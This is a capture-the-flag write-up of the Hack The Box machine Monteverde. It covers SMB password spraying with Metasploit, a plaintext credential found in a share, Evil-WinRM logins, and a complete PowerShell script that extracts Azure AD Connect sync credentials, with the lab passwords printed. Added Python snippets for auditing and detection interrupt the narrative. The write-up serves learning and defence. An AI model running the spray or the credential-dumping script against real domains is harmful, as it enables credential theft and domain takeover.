Hack The Box Writeup: Monteverde

As the second new box of 2020, Monteverde came into play: a Medium-difficulty Windows box worth 30 points towards your next rank on Hack The Box. Personally, I like the Windows machines better than the Linux ones, but that’s purely because I spend more of my time in the Microsoft ecosystem. Enough general shizzle, time to discover Monteverde.

Hack The Box infocard for Monteverde

An Nmap scan a day keeps the doctor away. First, let’s see what is available on this Windows box. LDAP, SMB and WinRM are available, so chances are that a large part of the enumeration can be done with them.

nmap -sC -sV -T5 -oA monteverde

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 10:55 GMT
Nmap scan report for
Host is up (0.061s latency).
Not shown: 989 filtered ports
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-09 11:05:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 9m27s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-09T11:08:14
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.68 seconds

With enum4linux you can quickly see whether accounts can be found, what the domain is, and which group memberships exist.

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 9 10:56:14 2020

| Target Information |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

| Getting domain SID for |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)

| Users on |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]

[+] Getting domain group memberships:
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
group:[Developers] rid:[0xa34]
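The membership lines above are worth a second look from the defender’s side: which accounts sit in administrative groups, and do any of them look like service or sync accounts? The following is an added example, not part of the original writeup or of enum4linux, that parses lines in enum4linux’s "has member" format and flags members of privileged groups. The input is a constructed subset of the lines shown above, and the service-account naming convention (svc-, SA..., AAD_) is an assumption.

```python
"""Audit enum4linux 'Getting domain group memberships' output for accounts
in administrative groups.  Added example, not part of the original writeup;
the input below is a constructed subset of the lines shown above."""
import re
from collections import defaultdict

MEMBER_RE = re.compile(
    r"Group '(?P<group>[^']+)' \(RID: (?P<rid>\d+)\) has member: (?P<member>\S+)"
)
# Well-known privileged groups plus anything with "admin" in its name
# (custom groups such as "Azure Admins" on this domain).
WELL_KNOWN_PRIVILEGED = {
    "Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators",
    "Account Operators", "Backup Operators", "Server Operators",
    "Print Operators", "Group Policy Creator Owners", "DnsAdmins",
}
ADMIN_NAME = re.compile(r"admin", re.IGNORECASE)
# Assumed naming convention for service/sync accounts: svc-*, SA<Name>, AAD_*
SERVICE_ACCOUNT = re.compile(r"\\(?:svc-|SA[A-Z]|AAD_)")

# Constructed sample: a subset of the membership lines from the writeup.
SAMPLE_MEMBERSHIPS = """\
Group 'Domain Guests' (RID: 514) has member: MEGABANK\\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\\SABatchJobs
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\\mhope
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\\Administrator
"""


def parse_memberships(text):
    """Return {group_name: [member, ...]} from enum4linux membership lines."""
    groups = defaultdict(list)
    for line in text.splitlines():
        m = MEMBER_RE.match(line.strip())
        if m:
            groups[m["group"]].append(m["member"])
    return dict(groups)


def privileged_members(groups):
    """Only the groups that grant administrative rights."""
    return {g: members for g, members in groups.items()
            if g in WELL_KNOWN_PRIVILEGED or ADMIN_NAME.search(g)}


def service_accounts_with_admin(groups):
    """Service/sync accounts in privileged groups: prime least-privilege findings."""
    return sorted({m for members in privileged_members(groups).values()
                   for m in members if SERVICE_ACCOUNT.search(m)})


if __name__ == "__main__":
    g = parse_memberships(SAMPLE_MEMBERSHIPS)
    for group, members in privileged_members(g).items():
        print(f"[!] {group}: {', '.join(members)}")
    print("[!] service accounts with admin rights:", service_accounts_with_admin(g))
```

On the sample data the audit reports "Azure Admins" and "Group Policy Creator Owners" as privileged groups and singles out the AAD_ sync account as a service account holding administrative group membership.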

The output returns a number of usernames but no further hints towards passwords. I put the usernames in a text file to quickly check, with the smb_login module in Metasploit, whether any of the accounts can be logged in to.

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<

       =[ metasploit v5.0.72-dev                          ]
+ -- --=[ 1963 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                 

First, I try the USER_AS_PASS option. It makes the module use each username as the password for that user in my list: a quick way to see whether a lazy administrator has been at work.

msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /home/user/Documents/boxes/monteverde/userlist.txt
USER_FILE => /home/user/Documents/boxes/monteverde/userlist.txt

msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true 
USER_AS_PASS => true

msf5 auxiliary(scanner/smb/smb_login) > run

Failed, Failed, Failed, Success! It looks like the password of SABatchJobs is simply: SABatchJobs.

[*] - - Starting SMB login bruteforce
[-] - - Failed: 'MEGABANK\dgalanos:dgalanos',
[-] - - Failed: 'MEGABANK\Guest:Guest',
[-] - - Failed: 'MEGABANK\mhope:mhope',
[-] - - Failed: 'MEGABANK\roleary:roleary',
[+] - - Success: 'MEGABANK\SABatchJobs:SABatchJobs'
[*] - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
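From the domain controller’s side, the run above looks like one source address producing failed logons (Event ID 4625) for several different accounts within seconds, followed by a success (4624) for the one account whose password matched. The following is an added example, not part of the original writeup, showing that detection logic. It works on a constructed, simplified one-line-per-event format (timestamp, event ID, source address, account) rather than real EVTX/XML records, so the field extraction is an assumption; the source addresses are made up.

```python
"""Detect a username-as-password / password-spray burst in Windows logon
events (4625 = failure, 4624 = success).  Added example, not part of the
original writeup; the event lines below are constructed for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source tries one password per account in quick
# succession, then succeeds against the last account tried.  A second,
# unrelated source fails once ten minutes later.
SAMPLE_EVENTS = """\
2020-02-09T11:20:01 4625 10.10.14.2 MEGABANK\\dgalanos
2020-02-09T11:20:02 4625 10.10.14.2 MEGABANK\\Guest
2020-02-09T11:20:02 4625 10.10.14.2 MEGABANK\\mhope
2020-02-09T11:20:03 4625 10.10.14.2 MEGABANK\\roleary
2020-02-09T11:20:04 4624 10.10.14.2 MEGABANK\\SABatchJobs
2020-02-09T11:31:00 4625 10.10.14.9 MEGABANK\\smorgan
"""


def parse_events(text):
    """Return [(timestamp, event_id, source_ip, account), ...]."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, src, account = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), src, account))
    return events


def find_sprays(events, window=timedelta(minutes=5), min_accounts=3):
    """Return {source_ip: {accounts}} for every source whose failed logons
    hit at least `min_accounts` distinct accounts inside one `window`.
    Many accounts, few attempts each, is the spray signature; a single
    account with many failures is ordinary brute force or a stale password."""
    failures = defaultdict(list)
    for ts, event_id, src, account in events:
        if event_id == 4625:
            failures[src].append((ts, account))

    findings = {}
    for src, attempts in failures.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            accounts = {acct for t, acct in attempts[i:] if t - start <= window}
            if len(accounts) >= min_accounts:
                findings[src] = accounts
                break
    return findings


def successes_after_spray(events, findings):
    """Successful logons from a spraying source: the accounts actually
    compromised, which is what the responder needs to reset first."""
    return sorted((src, acct) for _, event_id, src, acct in events
                  if event_id == 4624 and src in findings)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    sprays = find_sprays(evs)
    for src, accounts in sprays.items():
        print(f"[!] spray from {src}: {len(accounts)} accounts in window")
    for src, acct in successes_after_spray(evs, sprays):
        print(f"[!] success after spray: {acct} from {src}")
```

The window and threshold are tunable; the defaults flag the sample source after its fourth distinct account and attribute the subsequent SABatchJobs logon to it, while the lone failure from the second source stays below the threshold.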

[0x3] Path to User flag

The account cannot connect via Windows Remote Management, so first I browse the SMB shares with the SABatchJobs password that was found.

smbclient -U SABatchJobs -L
Enter WORKGROUP\SABatchJobs's password:

 Sharename Type Comment
 --------- ---- -------
 ADMIN$ Disk Remote Admin
 azure_uploads Disk
 C$ Disk Default share
 E$ Disk Default share
 IPC$ IPC Remote IPC
 NETLOGON Disk Logon server share
 SYSVOL Disk Logon server share
 users$ Disk

The users$ share contains a number of directories that I cannot access with these credentials. The only visible file is azure.xml.

smbclient \\\\monteverde\\users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  . D 0 Fri Jan 3 13:12:48 2020
  .. D 0 Fri Jan 3 13:12:48 2020
  dgalanos D 0 Fri Jan 3 13:12:30 2020
  mhope D 0 Fri Jan 3 13:41:18 2020
  roleary D 0 Fri Jan 3 13:10:30 2020
  smorgan D 0 Fri Jan 3 13:10:24 2020

  . D 0 Fri Jan 3 13:12:30 2020
  .. D 0 Fri Jan 3 13:12:30 2020

  . D 0 Fri Jan 3 13:41:18 2020
  .. D 0 Fri Jan 3 13:41:18 2020
  azure.xml AR 1212 Fri Jan 3 13:40:23 2020

  . D 0 Fri Jan 3 13:10:30 2020
  .. D 0 Fri Jan 3 13:10:30 2020

  . D 0 Fri Jan 3 13:10:24 2020
  .. D 0 Fri Jan 3 13:10:24 2020

  524031 blocks of size 4096. 518419 blocks available

It is a configuration file for Azure, and I don’t expect to need much of it in terms of code. What is interesting is the Password element. Since this file is in mhope’s directory, it may be his password.

<Objs Version="" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
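The file is a PowerShell CLIXML export (the output of Export-Clixml), and the point for a defender is that the password sits in a plain <S> string element rather than a <SS> SecureString, so anyone who can read the share can read the credential. The following is an added example, not part of the original writeup, of a small scanner that walks such a document and reports secret-looking properties stored as plain strings. The sample document is constructed: the dates and KeyId are those shown above, the type name is a placeholder, and the password value is a placeholder rather than the real one.

```python
"""Find plaintext secrets in PowerShell CLIXML (Export-Clixml) documents.
Added example, not part of the original writeup; the sample document is
constructed with placeholder type name and password."""
import re
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# Property names that usually hold secrets.
SECRET_NAME = re.compile(r"passw|secret|credential|apikey|token", re.IGNORECASE)

# Constructed sample in real Export-Clixml layout: properties live under
# <Props>; <S> is a plain string, <SS> would be a DPAPI-protected SecureString.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Example.PasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Example.PasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">EXAMPLE-PLACEHOLDER-NOT-THE-REAL-VALUE</S>
    </Props>
  </Obj>
</Objs>"""


def find_secret_properties(clixml_text):
    """Return [(property_name, element_tag, value)] for every property whose
    name looks like a secret, whatever element type it is stored in."""
    root = ET.fromstring(clixml_text)
    findings = []
    for elem in root.iter():
        name = elem.get("N")
        if not name or not SECRET_NAME.search(name):
            continue
        tag = elem.tag.rsplit("}", 1)[-1]  # strip the CLIXML namespace
        findings.append((name, tag, (elem.text or "").strip()))
    return findings


def plaintext_only(findings):
    """Keep only plain <S> strings: readable by anyone who can open the file.
    <SS> SecureString exports are bound by DPAPI to the exporting user and
    machine, so they are not exposed by the file alone."""
    return [f for f in findings if f[1] == "S"]


if __name__ == "__main__":
    for name, tag, value in plaintext_only(find_secret_properties(SAMPLE_CLIXML)):
        print(f"[!] plaintext secret property {name!r} (<{tag}>): {value[:4]}...")
```

Run over a share, this is the kind of check that would have caught azure.xml before an attacker did; the fix on the producing side is to export credentials as SecureString (or not to leave exports on a shared path at all).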

After the first user, I now also have a set of credentials for mhope, and with them I expect to find the user flag.

evil-winrm -i monteverde -u "megabank\mhope" -p "4n0therD4y@n0th3r$"

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents>
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir

    Directory: C:\Users\mhope\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt

User flag is in. Now on to finding a route to root.

*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt

[0x4] Path to Root flag

The machine is fairly bare and there is little of interest to browse through. In C:\Program Files you can see that this machine has Azure AD Connect installed, a piece of tooling for synchronising your on-premises Active Directory to Azure Active Directory. I do not expect this on an HTB box without it having a purpose. Will this be the road to root?

*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:31 PM                Microsoft SQL Server
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0

After some searching on Google I find the article Azure AD Connect for Red Teamers. It explains how to use a PowerShell script to dump the username and password of the account under which Azure AD Sync runs. The script is on the website; however, it does not work directly on this box.

After some errors about not being able to connect, I made some adjustments to the script. On the machine I found the folder C:\Program Files\Microsoft SQL Server\mssql14.mssqlserver, which explains why it is not working: the connection string in the original script does not work with this version of MSSQL, because MSSQL14 is Microsoft SQL Server 2017.

The line below is the one I adapted so that the connection string works with the version of MSSQL installed on Monteverde.

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

Below is the working script for dumping the Azure AD Sync credentials. As you can see at $client, the connection string differs from the original on XPN InfoSec’s blog.

# Azure-ADConnect-CredentialExtract.ps1
# Original author: Azure AD Connect for Red Teamers (XPN / Adam Chester)
# Changes: adjusted the $client connection string for MSSQL 2017 (MSSQL14).

# Connect to the local ADSync database over a trusted (Windows) connection.
$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Database=ADSync;Initial Catalog=ADSync;Trusted_Connection=yes;"
$client.Open()

# Key set identifiers needed to load the DPAPI-protected key set.
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# AD connector configuration: cleartext XML plus the encrypted credential blob.
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
$client.Close()

# Use ADSync's own key manager to load the key set and decrypt the blob.
Add-Type -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Domain and username come from the connector XML, the password from the decrypted blob.
$domain = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | Select-Object @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = Select-Xml -Content $config -XPath "//parameter[@name='forest-login-user']" | Select-Object @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = Select-Xml -Content $decrypted -XPath "//attribute" | Select-Object @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("[+] Domain: " + $domain.Domain)
Write-Host ("[+] Username: " + $username.Username)
Write-Host ("[+] Password: " + $password.Password)

I modified the script and saved it locally on my laptop. With the upload command in the Evil-WinRM shell you can easily upload it to the remote box.

*Evil-WinRM* PS C:\users\mhope\Videos> upload Azure-ADConnect-CredentialExtract.ps1

Info: Uploading Azure-ADConnect-CredentialExtract.ps1  to C:\users\mhope\Videos\ad2.ps1
Data: 2288 bytes of 2288 bytes copied

Info: Upload successful!

And there you have it! In this case, the Administrator account was used for Azure AD Sync.

*Evil-WinRM* PS C:\users\mhope\Videos> powershell ./Azure-ADConnect-CredentialExtract.ps1

[+] Username: administrator
[+]Password: d0m@in4dminyeah!

Through Evil-WinRM I can log in with the newly acquired Administrator credentials.

evil-winrm -i monteverde -u "megabank\Administrator" -p "d0m@in4dminyeah!"

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

As the last step of this box, I take the root flag. With this, Monteverde is officially rooted!

cat c:\Users\Administrator\Desktop\root.txt


Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?
